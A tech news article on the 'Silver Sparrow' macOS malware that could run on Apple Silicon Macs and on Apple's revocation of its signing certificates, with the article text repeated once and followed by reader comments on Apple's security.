Apple has taken steps to eradicate mysterious malware strain
Following the discovery of a new and unusual malware that had the potential to attack Macs running on Apple Silicon, Apple has moved to minimize any impact the maliciously-crafted software could have in the future.
On Saturday, malware was revealed by by Red Canary researchers to use an unusual attack vector to install malware onto macOS. The cluster, named by researchers as "Silver Sparrow," was also found to be an early example of malware that had the capability of attacking Apple Silicon Macs.
More unusually, the malware seemed to be an in-development or test malware, rather than a fully-realized threat, as it lacked a malicious payload. However, it did have the capability to add such an item at a later date through repeated hourly updates.
So far, it seems that no malicious payload has been delivered at all, and it appears unlikely one will be on the way anytime soon.
Shortly after the publication of the malware details, Apple took steps to curtail the potential damage that Silver Sparrow could cause down the line.
An Apple spokesperson informed AppleInsider the company had already revoked certificates for developer accounts used by the malware's creator to sign the packages. The action effectively prevents any new Macs from being infected by the malware, reducing any further spread.
As well as certificate-revocation, Apple notes that it also employs many security hardware and software protections in its products and services, as well as deploying regular software updates that can prevent threats from having an impact.
While the Mac App Store is probably one of the safest places to acquire Mac software due to these protections, the spokesperson added software acquired outside the Mac App Store is also safeguarded. Apple's use of the Notary Service and other security mechanisms are employed to detect malware and block it before it has a chance to run, they added.
On Saturday, malware was revealed by by Red Canary researchers to use an unusual attack vector to install malware onto macOS. The cluster, named by researchers as "Silver Sparrow," was also found to be an early example of malware that had the capability of attacking Apple Silicon Macs.
More unusually, the malware seemed to be an in-development or test malware, rather than a fully-realized threat, as it lacked a malicious payload. However, it did have the capability to add such an item at a later date through repeated hourly updates.
So far, it seems that no malicious payload has been delivered at all, and it appears unlikely one will be on the way anytime soon.
Shortly after the publication of the malware details, Apple took steps to curtail the potential damage that Silver Sparrow could cause down the line.
An Apple spokesperson informed AppleInsider the company had already revoked certificates for developer accounts used by the malware's creator to sign the packages. The action effectively prevents any new Macs from being infected by the malware, reducing any further spread.
As well as certificate-revocation, Apple notes that it also employs many security hardware and software protections in its products and services, as well as deploying regular software updates that can prevent threats from having an impact.
While the Mac App Store is probably one of the safest places to acquire Mac software due to these protections, the spokesperson added software acquired outside the Mac App Store is also safeguarded. Apple's use of the Notary Service and other security mechanisms are employed to detect malware and block it before it has a chance to run, they added.
Comments
This was a bit of malware that contained a binary compiled for BOTH Intel AND ASi Macs. That's not really a reason to doomclaim that Apple's ASi Macs are somehow more at threat than Intel ones.
Apparently the technically illiterate media types assumed the M1 Macs are impervious to this and, Ha Ha Ha Ha, they’re not. Apple has failed again!.
But this is perfectly understandable considering Apple’s constant virtue signaling regarding safety, security, privacy. When you pound you chest like Apple does you invite scrutiny and ‘gotcha’ journalism.
Obviously, the safest approach is to never download apps outside of the store and not click on clickbait. Still no one is perfect and a lot of users fall for tricks all the time.
I know Apple security updates eventually catch up to these types of threats, but it would be nice if they were working on ways to identifying them as they turn up or at least be able to scan for these items that do sneak in.
This one seems very sophisticated. It'll be interesting if they ever find out who was behind it and what the purpose was/is.
first, a significant new malware threat is worth knowing about. Second, because it’s a new hardware platform, any malware threats coming out on the M1 are newsworthy in an of themselves.